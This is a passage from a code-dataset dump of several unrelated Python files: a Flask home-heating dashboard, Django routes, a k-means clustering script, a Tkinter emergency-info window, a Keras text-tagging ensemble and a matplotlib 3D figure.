Chương trình sẽ tiếp tục!\")\n else:\n print(\"Dữ liệu đã nhập không phải số nguyên\")\n\"\"\"\n\n\ndef enter_data():\n \"\"\"\n - Hàm này thực hiện nhiệm vụ nhập vào một số nguyên dương bất kỳ từ bàn phím.\n - Hoạt động:\n + hàm sẽ đọc các ký tự nhập vào từ bàn phím.\n + Nếu đó là một số nguyên dương ta trả về giá trj n\n + Nếu đó là số không dương ta bắt đầu lại. bắt người dùng nhập lại giá trị.\n + Nếu đó không phải là một số nguyên thì ta bắt người dùng nhập lại.\n - Hàm sẽ thực hiện liên tục cho đến khi ký tự nhận được là một số nguyên dương.\n :return: Trả về giá trị là một số nguyên dương.\n \"\"\"\n while True:\n n = input(\"Nhập 1 số nguyên: \")\n # Câu lệnh đọc các ký tự từ bàn phím\n if n.isnumeric(): # Hàm diều kiện n.isumeric() sẽ trả lại True nếu tất cả ký tự là chữ số\n n = int(n) # Nếu ký tự nhập là số ta chuyển đổi thành số nguyên nguyên bằng hàm int()\n if n > 0: # Kiểm tra xem số n > 0 hay ko?\n print(\"Đã nhập số dương\") # In ra khi số n là số nguyên dương\n return n # Trả lại giá trị n\n print(\"Đã nhập số không dương. Chương trình sẽ tiếp tục!\") # In ra khi n là số không dương\n else:\n print(\"Dữ liệu đã nhập không phải số nguyên\") # In ra ko các ký tự không phải là các chữ số\n\n\na = enter_data()\nprint(a)\n","sub_path":"Buoi7_bai13_giaithichham.py","file_name":"Buoi7_bai13_giaithichham.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"23385112","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.logandreg),\n path('register', views.register),\n path('login', views.login),\n path('process_quote', views.process_quote),\n path('quotes', views.quotes),\n path('logout', views.logout),\n path('user_profile/',views.profile),\n path('my_profile/', views.edituser),\n path('updateaccount/', views.updateaccount),\n path('delete/', views.destroy),\n path('like/', views.add_like),\n\n]\n","sub_path":"python_stack1/django/django_full_stack/quote_dash/userquote/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"448754458","text":"#!flask/bin/python3\nfrom flask import Flask, render_template, request, redirect\nimport os, os.path, sys, subprocess, socket, sqlite3, threading\nimport math, glob\nimport datetime, time\nfrom app import app\n\ndata=[]\ndbData=[]\ndbData2=[]\ntimeData=[]\ngraphDataTEMP=[]\ngraphDataTIME=[]\nindexCSS=['styles/base_style.css', 'styles/index_style.css']\nmobileCSS=['styles/base_style.css', 'styles/mobile_style.css']\nsummerMONTHS=['June', 'July', 'August', 'September']\nsource='INDEX'\n\nworkingdir='/media/Backup/GitRepo/Heating'\nlib_path = os.path.abspath(os.path.join(workingdir, 'lib'))\nsys.path.append(lib_path)\n\ndef dateTime():\n global dateTimeLIST\n now=datetime.datetime.now()\n dateTimeLIST=[]\n dateTimeLIST.append(now.strftime(\"%A\"))\n dateTimeLIST.append(now.strftime(\"%d\"))\n dateTimeLIST.append(now.strftime(\"%B\"))\n dateTimeLIST.append(now.strftime(\"%Y\"))\n dateTimeLIST.append(str(now.strftime(\"%H:%M:%S\")))\n dateTimeLIST.append(now.strftime(\"%a\"))\n \ndef getData():\n global dbData, dbData2, timeData, graphDataTEMP, graphDataTIME, scheduleRUN, summerTEXT\n dateTime()\n db=(workingdir+\"/app/database/templogs/\"+dateTimeLIST[3]+\"/\"+dateTimeLIST[2]+\"/\"+dateTimeLIST[1]+\".db\")\n with sqlite3.connect(db) as tempconn:\n curs=tempconn.cursor()\n 
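# Newest temperature, override and timer rows, plus the last 10000\n        # temperature samples down-sampled (every 250th point) for the graph.\n        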
curs.execute('SELECT * FROM temps ORDER BY ROWID DESC LIMIT 1')\n dbData=curs.fetchone()\n curs.execute('SELECT * FROM override ORDER BY ROWID DESC LIMIT 1')\n dbData2=curs.fetchone()\n curs.execute('SELECT * FROM time ORDER BY ROWID DESC LIMIT 1')\n timeData=curs.fetchone()\n curs.execute('SELECT temp, timestamp FROM temps ORDER BY ROWID ASC LIMIT 10000')\n graphData=curs.fetchall()\n graphData=graphData[::250]\n graphDataTEMP= ( x[0] for x in graphData)\n graphDataTIME= ( x[1] for x in graphData)\n scheduleRUN=dbData[8]\n schedON=scheduleRUN[2:7]\n schedOFF=scheduleRUN[11:16]\n if (scheduleRUN == '') or (scheduleRUN == 'OFF'):\n scheduleRUN='OFF'\n else:\n scheduleRUN=(schedON+' till '+schedOFF)\n if (dbData2[5] == 'ON') and (dbData2[4] == 'OFF'):\n summerTEXT=\"Manual Summer Mode\"\n elif (dbData2[5] == 'ON') and (dbData2[4] == 'ON'):\n summerTEXT=\"Manual Winter Mode\"\n elif (dbData2[4] == 'ON') and (dateTimeLIST[2] in summerMONTHS):\n summerTEXT=\"Summer Mode Active\"\n else:\n summerTEXT=''\n \ndef manualoverride():\n dateTime()\n db=(workingdir+\"/app/database/templogs/\"+dateTimeLIST[3]+\"/\"+dateTimeLIST[2]+\"/\"+dateTimeLIST[1]+\".db\")\n with sqlite3.connect(db) as stateconn:\n curs=stateconn.cursor()\n curs.execute('SELECT * FROM override ORDER BY ROWID DESC LIMIT 1')\n lastRow=curs.fetchone()\n if lastRow[2] == 'ON':\n with sqlite3.connect(db) as stateconn:\n curs=stateconn.cursor()\n curs.execute(\"INSERT INTO override values (?, ?, ?, ?, ?, ?);\", (dateTimeLIST[4], '', 'OFF', 'OFF', lastRow[4], lastRow[5]))\n stateconn.commit()\n else:\n with sqlite3.connect(db) as stateconn:\n curs=stateconn.cursor()\n curs.execute(\"INSERT INTO override values (?, ?, ?, ?, ?, ?);\", (dateTimeLIST[4], '', 'ON', 'OFF', lastRow[4], lastRow[5]))\n stateconn.commit()\n \ndef advancedoverride():\n dateTime()\n db=(workingdir+\"/app/database/templogs/\"+dateTimeLIST[3]+\"/\"+dateTimeLIST[2]+\"/\"+dateTimeLIST[1]+\".db\")\n with sqlite3.connect(db) as stateconn:\n curs=stateconn.cursor()\n curs.execute('SELECT * FROM override ORDER BY ROWID DESC LIMIT 1')\n lastRow=curs.fetchone()\n advancedOverride=lastRow[3]\n if advancedOverride == 'OFF':\n hourPlus1=datetime.datetime.now() + datetime.timedelta(hours=1)\n advancedOverride=str(hourPlus1.strftime(\"%H:%M\"))\n with sqlite3.connect(db) as stateconn:\n curs=stateconn.cursor()\n curs.execute(\"INSERT INTO override values (?, ?, ?, ?, ?, ?);\", (dateTimeLIST[4], '', 'ON', advancedOverride, lastRow[4], lastRow[5]))\n stateconn.commit()\n else:\n with sqlite3.connect(db) as stateconn:\n curs=stateconn.cursor()\n curs.execute(\"INSERT INTO override values (?, ?, ?, ?, ?, ?);\", (dateTimeLIST[4], '', 'OFF', 'OFF', lastRow[4], lastRow[5]))\n stateconn.commit()\n\ndef summermode():\n dateTime()\n db=(workingdir+\"/app/database/templogs/\"+dateTimeLIST[3]+\"/\"+dateTimeLIST[2]+\"/\"+dateTimeLIST[1]+\".db\")\n with sqlite3.connect(db) as tempconn:\n curs=tempconn.cursor()\n curs.execute('SELECT * FROM override ORDER BY ROWID DESC LIMIT 1')\n lastRow=curs.fetchone()\n if (lastRow[4] == 'ON') and (lastRow[5] == 'OFF'):\n summerOverride='OFF'\n manSumOverride='ON'\n elif (lastRow[4] == 'OFF') and (lastRow[5] == 'OFF'):\n summerOverride='OFF'\n manSumOverride='ON'\n elif (lastRow[4] == 'OFF') and (lastRow[5] == 'ON'):\n summerOverride='ON'\n manSumOverride='ON'\n else:\n summerOverride='OFF'\n manSumOverride='OFF' \n curs.execute(\"INSERT INTO override values (?, ?, ?, ?, ?, ?);\", (dateTimeLIST[4], lastRow[1], lastRow[2], lastRow[3], summerOverride, 
manSumOverride))\n        tempconn.commit()\n \n@app.route('/')\n@app.route('/index')\ndef home():\n    global source\n    getData()\n    source=\"INDEX\"\n    return render_template(\"index.html\", source=source, styles=indexCSS, data=dateTimeLIST, dbData=dbData, dbData2=dbData2, summerTEXT=summerTEXT, timeData=timeData, graphDataTEMP=graphDataTEMP, graphDataTIME=graphDataTIME, scheduleRUN=scheduleRUN)\n\n@app.route('/mobile')\ndef mobile():\n    global source\n    getData()\n    source=\"MOBILE\"\n    return render_template(\"mobile.html\", source=source, styles=mobileCSS, data=dateTimeLIST, dbData=dbData, dbData2=dbData2, summerTEXT=summerTEXT, timeData=timeData, graphDataTEMP=graphDataTEMP, graphDataTIME=graphDataTIME, scheduleRUN=scheduleRUN)\n\n@app.route('/manual')\ndef manual():\n    global source\n    manualoverride()\n    return redirect(\"/\")\n\n@app.route('/advance')\ndef advance():\n    global source\n    advancedoverride()\n    return redirect(\"/\")\n\n@app.route('/winter')\ndef winter():\n    global source\n    summermode()\n    return redirect(\"/\")\n\n@app.route('/mobmanual')\ndef mobmanual():\n    global source\n    manualoverride()\n    return redirect(\"/mobile\")\n\n@app.route('/mobadvance')\ndef mobadvance():\n    advancedoverride()\n    return redirect(\"/mobile\")\n\n@app.route('/mobsummer')\ndef mobsummer():\n    summermode()\n    return redirect(\"/mobile\")\n \n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"249787103","text":"# coding: utf-8\nfrom common.layers import *\nfrom common.loss_layer import *\n\nlayer_dict={\n    'relu':Relu,'sigmoid':Sigmoid, 'tanh':Tanh,\n    'conv':Convolution,'deconv':Deconvolution,'pool':Pooling,'affine':Affine,\n    'batchnorm':BatchNormalization,'gap':GAP,\n    'convres':ConvResNet,'repeat':Repeat,'dropout':Dropout,'flatten':Flatten,\n    'toimage':ToImage\n    }\n    \nloss_layer_dict={\n    'mse':MSE,'softmax':SoftmaxWithLoss\n    }","sub_path":"common/layer_dictionary.py","file_name":"layer_dictionary.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"105879921","text":"\n\nfrom xai.brain.wordbase.verbs._revolve import _REVOLVE\n\n#class header\nclass _REVOLVES(_REVOLVE, ):\n\tdef __init__(self,): \n\t\t_REVOLVE.__init__(self)\n\t\tself.name = \"REVOLVES\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"revolve\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_revolves.py","file_name":"_revolves.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"631759010","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n#import matplotlib as mpl\n#mpl.use('pgf')\nfrom matplotlib import pyplot\nimport mpl_toolkits.mplot3d.axes3d as p3\nfrom mpl_toolkits.mplot3d import proj3d\n\nimport sys\nsys.path.append(r'C:\\Documents and Settings\\The One\\My Documents\\tony\\2014\\xelatexfolder\\pgf_related\\programming_drawing_in_3D_toolbox')\nimport vector_drawing_basic_geometry_3D as tool\n\n#### The plotting of a vector-based graphics using the above points location information.\nfig2 = pyplot.figure(2,figsize=(4, 3),dpi=100)\nax2 = p3.Axes3D(fig2)\nax2.view_init(elev=40, azim=-40)\nax2.set_color_cycle('b')\n\n\npo = np.array([0,0,0])#origin\npx = np.array([1,0,0])\npy = np.array([0,1,0])\npz = np.array([0,0,1])\npA = np.array([1,1,1])/2.0\n\n#bb = 1.3\n#plb = 
np.array([-0.1*bb,0,-0.1*bb])\n#plt = np.array([-0.1*bb,0,5*bb])\n#ptr = np.array([5*bb,0,5*bb])\n#pbr = np.array([5*bb,0,-0.1*bb])\n\n#xyz axes\nfarrowx = tool.Arrow3D(*zip(po,px),mutation_scale=16, lw=2, arrowstyle=\"-|>\", \n color=\"b\")\nax2.add_artist(farrowx)\nfarrowy = tool.Arrow3D(*zip(po,py),mutation_scale=16, lw=2, arrowstyle=\"-|>\", \n color=\"b\")\nax2.add_artist(farrowy)\nfarrowz = tool.Arrow3D(*zip(po,pz),mutation_scale=16, lw=2, arrowstyle=\"-|>\", \n color=\"b\")\nax2.add_artist(farrowz)\nfarrowA = tool.Arrow3D(*zip(po,pA),mutation_scale=16, lw=2, arrowstyle=\"-|>\", \n color=\"k\")\nax2.add_artist(farrowA)\n\nn_vec = np.cross(px/np.linalg.norm(px),pA/np.linalg.norm(pA))\narc_alpha = 0.3*tool.circle_arc(n_vec,px,pA,20)\nlarc_alpha, = ax2.plot(arc_alpha[:,0],arc_alpha[:,1],arc_alpha[:,2],'r',lw=2)\n\n\n\n\nax2.text(*px, s = r'$x$', fontsize=14,verticalalignment='bottom', horizontalalignment='right')\nax2.text(*py, s = r'$y$', fontsize=14,verticalalignment='bottom', horizontalalignment='right')\nax2.text(*pz, s = r'$z$', fontsize=14,verticalalignment='top', horizontalalignment='left')\nax2.text(*pA, s = r\"$A$ at (0.5,0.5,0.5)\", fontsize=14,verticalalignment='bottom', horizontalalignment='left')\n\n\n\n#draw_perpendicular_sign(np.cross(pB-pQ,pE-pQ),pB-pQ,pE-pQ,pQ,ax2)\n\n\n#axis1.Axis(ax2,'r')\n#ax2.autoscale_view()\n#ax2.pbaspect= [1,1,0.5]\n#ax2.auto_scale_xyz()\n\nff = 0.75\nXt,Yt,Zt = zip(po,px,py,pz,pA)#,ff*plb,ff*ptr,ff*plt,ff*pbr)\nX = np.array(Xt)\nY = np.array(Yt)\nZ = np.array(Zt)\n\nmax_range = np.array([X.max()-X.min(), Y.max()-Y.min(), Z.max()-Z.min()]).max() / 2.0\n\n\nmid_x = (X.max()+X.min()) * 0.5\nmid_y = (Y.max()+Y.min()) * 0.5 \nmid_z = (Z.max()+Z.min()) * 0.5\nax2.set_xlim3d(mid_x - max_range, mid_x + max_range)\nax2.set_ylim3d(mid_y - max_range, mid_y + max_range)\nax2.set_zlim3d(mid_z - max_range, mid_z + max_range)\n#ax2.set_xlim3d([-3, 8])\n#ax2.set_ylim3d([-3,8])\n#ax2.set_zlim3d([-3,8])\n#ax2.set_xlim([-0.5,3.7])\n#ax2.set_ylim([-0.5,3.7])\n#ax2.set_zlim([0,6])\n\n\n#ax2.annotate(s = r'$x$',xy = tuple(proj3d.proj_transform(*px, M = ax2.get_proj()))[:2], fontsize = 14, bbox={'pad':8,'fill':None,'edgecolor':'None'},va='top',ha='left')\n#ax2.annotate(s = r'$y$',xy = tuple(proj3d.proj_transform(*py, M = ax2.get_proj()))[:2], fontsize = 14, bbox={'pad':8,'fill':None,'edgecolor':'None'},va='top',ha='right')\n#ax2.annotate(s = r'$z$',xy = tuple(proj3d.proj_transform(*pz, M = ax2.get_proj()))[:2], fontsize = 14, bbox={'pad':12,'fill':None,'edgecolor':'None'},va='bottom',ha='right')\n\n\nax2.set_xticks([])\nax2.set_yticks([])\nax2.set_zticks([])\nax2.w_xaxis.line.set_visible(False) #turn off axis visibility\n#ax2.w_xaxis.line.set_color([0,0,0,0])\nax2.w_yaxis.line.set_color([0,0,0,0]) # change the color of axis\nax2.w_zaxis.line.set_color([0,0,0,0])\n#ax2.spines['left'].set_color('b') didn't work on 3D\nax2.set_axis_off() #-> this can turn off the background curtain\n#ax2.axhline(y=1,xmin=0,xmax=1)\n#ax2.set_frame_on(True)\n#ax2.set_axis_bgcolor('b')\n#ax2.set_position() #set the bbox of the whole axes\n#ax2.set_zbound()\npyplot.show()\n#pyplot.savefig(r'C:\\Documents and Settings\\The One\\My Documents\\tony\\2014\\xelatexfolder\\pgf_related\\pgf\\lemma4_fig4.pgf')\n\n","sub_path":"drawing_code/python/py_annotate_code_documentation/figures/circle_arc_fig.py","file_name":"circle_arc_fig.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} 
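# The bounding-cube trick above (one shared max_range so x, y and z keep a
# cubic aspect) generalises to a small helper; a sketch, assuming an Axes3D
# `ax` and an (N, 3) array `pts` of the plotted points:
import numpy as np

def set_equal_3d_limits(ax, pts):
    # Half the largest extent across the three axes fixes the cube size.
    half = (pts.max(axis=0) - pts.min(axis=0)).max() / 2.0
    mid = (pts.max(axis=0) + pts.min(axis=0)) / 2.0
    ax.set_xlim3d(mid[0] - half, mid[0] + half)
    ax.set_ylim3d(mid[1] - half, mid[1] + half)
    ax.set_zlim3d(mid[2] - half, mid[2] + half)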
+{"seq_id":"298551936","text":"import numpy as np\nimport matplotlib.pyplot as plt\ndef loadDataSet(filename):\n \n \"\"\"\n 读取数据集\n\n Args:\n filename: 文件名\n Returns:\n dataMat: 数据样本矩阵\n \"\"\"\n dataMat = []\n fr = open(filename)\n for line in fr.readlines():\n curLine = line.strip().split('\\t')\n # 通过map函数批量转换\n fitLine = map(float, curLine)\n dataMat.append(fitLine)\n return dataMat\n\ndef distEclud(vecA, vecB):\n \"\"\"\n 计算两向量的欧氏距离\n\n Args:\n vecA: 向量A\n vecB: 向量B\n Returns:\n 欧式距离\n \"\"\"\n return np.sqrt(np.sum(np.power(vecA - vecB, 2)))\n\ndef randCent(dataSet, k):\n \"\"\"\n 随机生成k个聚类中心\n\n Args:\n dataSet: 数据集\n k: 簇数目\n Returns:\n centroids: 聚类中心矩阵\n \"\"\"\n _, n = dataSet.shape\n centroids = np.mat(np.zeros((k, n)))\n for j in range(n):\n # 随机聚类中心落在数据集的边界之内\n minJ = np.min(dataSet[:, j])\n maxJ = np.max(dataSet[:, j])\n rangeJ = float(maxJ - minJ)\n centroids[:, j] = minJ + rangeJ * np.random.rand(k, 1)\n return centroids\n\ndef kMeans(dataSet, k, maxIter = 5):\n \"\"\"\n K-Means\n\n Args:\n dataSet: 数据集\n k: 聚类数\n Returns:\n centroids: 聚类中心\n clusterAssment: 点分配结果\n \"\"\"\n # 随机初始化聚类中心\n centroids = randCent(dataSet, k)\n m, n = np.shape(dataSet)\n # 点分配结果: 第一列指明样本所在的簇,第二列指明该样本到聚类中心的距离\n clusterAssment = np.mat(np.zeros((m, 2)))\n # 标识聚类中心是否仍在改变\n clusterChanged = True\n # 直至聚类中心不再变化\n iterCount = 0\n while clusterChanged and iterCount < maxIter:\n iterCount += 1\n clusterChanged = False\n # 分配样本到簇\n for i in range(m):\n # 计算第i个样本到各个聚类中心的距离\n minIndex = 0\n minDist = np.inf\n for j in range(k):\n dist = distEclud(dataSet[i, :], centroids[j, :])\n if(dist < minDist):\n minIndex = j\n minDist = dist\n # 判断cluster是否改变\n if(clusterAssment[i, 0] != minIndex):\n clusterChanged = True\n clusterAssment[i, :] = minIndex, minDist**2\n # 刷新聚类中心: 移动聚类中心到所在簇的均值位置\n for cent in range(k):\n # 通过数组过滤获得簇中的点\n ptsInCluster = dataSet[np.nonzero(clusterAssment[:, 0].A == cent)[0]]\n if ptsInCluster.shape[0] > 0:\n # 计算均值并移动\n centroids[cent, :] = np.mean(ptsInCluster, axis=0)\n return centroids, clusterAssment\ndef biKmeans(dataSet, k):\n \"\"\"\n Args:\n dataSet: 数据集\n k: 聚类数\n Returns:\n centroids: 聚类中心\n clusterAssment: 点分配结果\n \"\"\"\n # 随机初始化聚类中心\n centroids = randCent(dataSet, k)\n m, n = np.shape(dataSet)\n # 点分配结果: 第一列指明样本所在的簇,第二列指明该样本到聚类中心的距离\n clusterAssment = np.mat(np.zeros((m, 2)))\n # 标识聚类中心是否仍在改变\n clusterChanged = True\n # 直至聚类中心不再变化\n while clusterChanged:\n clusterChanged = False\n # 分配样本到簇\n for i in range(m):\n # 计算第i个样本到各个聚类中心的距离\n minIndex = 0\n minDist = np.inf\n for j in range(k):\n dist = distEclud(dataSet[i, :], centroids[j, :])\n if(dist < minDist):\n minIndex = j\n minDist = dist\n # 判断cluster是否改变\n if(clusterAssment[i, 0] != minIndex):\n clusterChanged = True\n clusterAssment[i, :] = minIndex, minDist**2\n # 刷新聚类中心: 移动聚类中心到所在簇的均值位置\n for cent in range(k):\n # 通过数组过滤获得簇中的点\n ptsInCluster = dataSet[np.nonzero(\n clusterAssment[:, 0].A == cent)[0]]\n # 计算均值并移动\n centroids[cent, :] = np.mean(ptsInCluster, axis=0)\n return centroids, clusterAssment\ndata='D:/machinelearninginaction/Ch10/testSet.txt'\ndataMat = np.mat(loadDataSet(data))\ncentroids1, clusterAssment1 = biKmeans(dataMat, 4)\ncentroids0,clusterAssment0=kMeans(dataMat, 4)\nclusterCount1 = centroids1.shape[0]\nclusterCount0=centroids0.shape[0]\nm = dataMat.shape[0]\n # 绘制散点图\npatterns = ['o', 'D', '^','p']\ncolors = ['b', 'g', 'y','r']\nfig = plt.figure()\ntitle = 'bi-kmeans with k=4'\nax = fig.add_subplot(211, title=title)\nfor k in range(clusterCount1):\n # 绘制聚类中心,centrioids:聚类中心点,\n 
ax.scatter(centroids1[k,0], centroids1[k,1], color='r', marker='+', linewidth=20)\n for i in range(m):\n # 绘制属于该聚类中心的样本\n ptsInCluster1 = dataMat[np.nonzero(clusterAssment1[:, 0].A==k)[0]]\n ax.scatter(ptsInCluster1[:, 0].flatten().A[0], ptsInCluster1[:, 1].flatten().A[0], marker=patterns[k], color=colors[k])\nax=fig.add_subplot(212,title='kmeans with k=4')\nfor k in range(clusterCount0):\n # 绘制聚类中心,在绘制聚类中心时主要将其与scatter形式展现\n ax.scatter(centroids0[k,0], centroids0[k,1], color='r', marker='+', linewidth=20)\n for i in range(m):\n # 绘制属于该聚类中心的样本\n ptsInCluster0 = dataMat[np.nonzero(clusterAssment0[:, 0].A==k)[0]]\n ax.scatter(ptsInCluster0[:, 0].flatten().A[0], ptsInCluster0[:, 1].flatten().A[0], marker=patterns[k], color=colors[k])\nplt.show()","sub_path":"demo3/demo2Kmeans/kMeans.py","file_name":"kMeans.py","file_ext":"py","file_size_in_byte":5867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"479691605","text":"from tkinter import *\r\n\r\n\r\n#creer une première fenêtre\r\nurgence_fenetre = Tk()\r\n\r\n#personnalisation\r\nurgence_fenetre.title(\"KeepKalm\")\r\nurgence_fenetre.geometry(\"700x600\")\r\nurgence_fenetre.config(bg=\"#34d4ff\")\r\nurgence_fenetre.minsize(1200,720)\r\nurgence_fenetre.attributes('-fullscreen', True)\r\n\r\nl1 = LabelFrame(urgence_fenetre, text=\"Langues\", padx=20, pady=15,relief=\"raised\",bd=5)\r\nl1.pack(side=LEFT, anchor=NW)\r\nl1.configure(bg=\"#22ffb9\")\r\nLabel(l1, text=\"FR\", bg=\"#22ffb9\").pack()\r\n\r\nl2 = LabelFrame(urgence_fenetre, text=\"Infos\", padx=20, pady=15,relief=\"raised\",bd=5)\r\nl2.pack(side=RIGHT, anchor=NE)\r\nl2.configure(bg=\"#22ffb9\")\r\nLabel(l2, text=\"Rouault\",bg=\"#01ffbb\").pack()\r\nLabel(l2, text=\"Clément\",bg=\"#01ffbb\").pack()\r\n\r\ntext_urgence = Label(urgence_fenetre, text=\"URGENCE\", padx=20, pady=15,relief=\"raised\")\r\ntext_urgence.pack(side=TOP, anchor=N)\r\ntext_urgence.configure(bg=\"red\", font=90)\r\n\r\nFrame3 = Frame(urgence_fenetre,bg=\"#34d4ff\", borderwidth=0)\r\nFrame3.pack(anchor=\"n\", pady=50)\r\n\r\nFrame8 = Frame(urgence_fenetre, bg=\"#34d4ff\", borderwidth=0)\r\nFrame8.pack(anchor=\"n\",side=RIGHT, pady=50)\r\n\r\nFrame4 = Frame(urgence_fenetre,bg=\"#34d4ff\", borderwidth=0)\r\nFrame4.pack(anchor=\"n\", side=LEFT, pady=50, padx=50)\r\n\r\n\r\n\r\nFrame1 = Frame(Frame3)\r\nFrame1.pack()\r\n\r\ntext_frame1=Label(Frame1, text=\"En cas de problème appeler d'urgence le personnel de santé qualifié : \",bg=\"#34d4ff\", pady=20,font=30,fg=\"red\")\r\ntext_frame1.pack()\r\n\r\nFrame2 = Frame(Frame4)\r\nFrame2.pack()\r\ntext_frame2 = Label(Frame2,text=\"Numéros d'urgence à contacter :\",bg=\"#34d4ff\",font=10,fg=\"red\")\r\ntext_frame2.pack()\r\n\r\nFrame5 = Frame(Frame4)\r\nFrame5.pack()\r\ntext_frame5 = Label(Frame5, text=\"Samu : 15 \\n\\n Pompiers : 18 \\n\\n Police secours : 17 \\n\\n général : 112\", bg=\"#34d4ff\", font=20 )\r\ntext_frame5.pack()\r\n\r\nFrame6 = Frame(Frame8)\r\nFrame6.pack()\r\ntext_frame6 = Label(Frame6, text=\"Conseils en cas d'urgence : \", bg=\"#34d4ff\", font=20, fg=\"red\")\r\ntext_frame6.pack()\r\n\r\nFrame7 = Frame(Frame8)\r\nFrame7.pack()\r\ntext_frame7 = Label(Frame7, text=\"Allonger la personne en position latéral de sécurité. \\n\\n Laisser de l'espace. 
\\n\\n Ne pas laisser sans surveillance jusqu'à l'arrivé des secours!\", bg=\"#34d4ff\", font=10)\r\ntext_frame7.pack()\r\n\r\ndef retour():\r\n urgence_fenetre.destroy()\r\n import tkinter_interface\r\n\r\nboutonsortie = Button(urgence_fenetre, text=\"Retour\", bg=\"red\",command=retour).pack()\r\n\r\n\r\nurgence_fenetre.mainloop()\r\n","sub_path":"GUI1.py","file_name":"GUI1.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"385469577","text":"import numpy as np\nimport sys \nimport pickle\nfrom keras.models import load_model\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing import sequence\nfrom sklearn.metrics import matthews_corrcoef\nimport keras.backend as K\nfrom sklearn.externals import joblib\n\ntest_path = sys.argv[1] #test_data.csv\noutput_path = sys.argv[2]\n\ndef f1_measure(y_true,y_pred):\n thresh = 0.4\n y_pred = K.cast(K.greater(y_pred,thresh),dtype='float32')\n tp = K.sum(y_true * y_pred,axis=-1)\n \n precision=tp/(K.sum(y_pred,axis=-1)+K.epsilon())\n recall=tp/(K.sum(y_true,axis=-1)+K.epsilon())\n return K.mean(2*((precision*recall)/(precision+recall+K.epsilon())))\n\n\nmodel = load_model('my_model.h5',custom_objects={'f1_measure':f1_measure})\nmodel_1 = load_model('my_model_1.h5',custom_objects={'f1_measure':f1_measure})\nmodel_2 = load_model('my_model_2.h5',custom_objects={'f1_measure':f1_measure})\nmodel_3 = load_model('my_model_3.h5',custom_objects={'f1_measure':f1_measure})\nvectorizer = pickle.load(open('vectorizer.pkl', 'rb'))\nclassif = joblib.load('model_sk.pkl')\n\nmlb = pickle.load(open('mlb.pkl','rb'))\ntokenizer = pickle.load(open('tokenizer.pkl','rb'))\n\nword_index = tokenizer.word_index\n\nf = open(test_path,'r').readlines()\ntxt = []\nbatch_size = 128\nf = f[1:]\n\nprint ('Parse the data')\nfor i in range(len(f)):\n d1 = f[i].find(',')\n txt.append(f[i][d1+1:].strip())\n\ntest_sequences = tokenizer.texts_to_sequences(txt)\nx_test_v = vectorizer.transform(txt)\n\nprint('Pad sequences:')\nx_test = sequence.pad_sequences(test_sequences,maxlen=306) # maxlen being known from hw5_rnn.py\n\nprint ('x_test shape:',x_test.shape)\n\nout_0 = model.predict(x_test,batch_size=batch_size,verbose=1)\nout_1 = model_1.predict(x_test,batch_size=batch_size,verbose=1)\nout_2 = model_2.predict(x_test,batch_size=batch_size,verbose=1)\nout_3 = model_3.predict(x_test,batch_size=batch_size,verbose=1)\n\ny_pred_0 = np.array([[1 if out_0[i,j]>=0.4 else 0\n for j in range(out_0.shape[1])]\n for i in range(out_0.shape[0])]\n )\ny_pred_1 = np.array([[1 if out_1[i,j]>=0.4 else 0\n for j in range(out_1.shape[1])]\n for i in range(out_1.shape[0])]\n )\ny_pred_2 = np.array([[1 if out_2[i,j]>=0.4 else 0\n for j in range(out_2.shape[1])]\n for i in range(out_2.shape[0])]\n )\ny_pred_3 = np.array([[1 if out_3[i,j]>=0.4 else 0\n for j in range(out_3.shape[1])]\n for i in range(out_3.shape[0])]\n )\ny_pred_4 = classif.predict(x_test_v)\n\ny_pred_s = y_pred_0 + y_pred_1 + y_pred_2 + y_pred_3 + y_pred_4\n\ny_pred = np.array([[1 if y_pred_s[i,j]>=3 else 0\n for j in range(y_pred_s.shape[1])]\n for i in range(y_pred_s.shape[0])]\n )\n\nresult = mlb.inverse_transform(y_pred)\n\nof = open(output_path,'w')\nout_txt = '\"id\",\"tags\"\\n'\n\nfor i in range(len(result)):\n out_txt += '\"'+str(i)+'\"'+',\"'\n if (result[i]==()):\n out_txt += 'SPECULATIVE-FICTION' + ' '\n else:\n for te in result[i]:\n out_txt += te + ' '\n out_txt = out_txt[:-1]\n out_txt += '\"\\n'\n\nof. 
write(out_txt)\nof.close()\n","sub_path":"hw5/hw5_test.py","file_name":"hw5_test.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"623382894","text":"import string\n\nimport numpy as np\nfrom keras.utils import to_categorical\nfrom keras_preprocessing.sequence import pad_sequences\n\n\nclass CaptionPreprocessor:\n    def __init__(self):\n        self.caption_shape = [0]\n\n        self.EXTRA_PADDING = 10\n        self.PAD_TOKEN = \"<0>\"\n        self.SOS_TOKEN = \"<sos>\"\n        self.EOS_TOKEN = \"<eos>\"\n\n        self.word2index = {}\n        self.word2count = {}\n        self.index2word = {}\n\n        self.max_index = 0\n        self.add_word(self.PAD_TOKEN)\n        self.add_word(self.SOS_TOKEN)\n        self.add_word(self.EOS_TOKEN)\n        self.translate_map = dict((ord(c), \" \") for c in string.punctuation)\n\n    def add_word(self, word):\n        if word not in self.word2index:\n            self.word2index[word] = self.max_index\n            self.word2count[word] = 1\n            self.index2word[self.max_index] = word\n            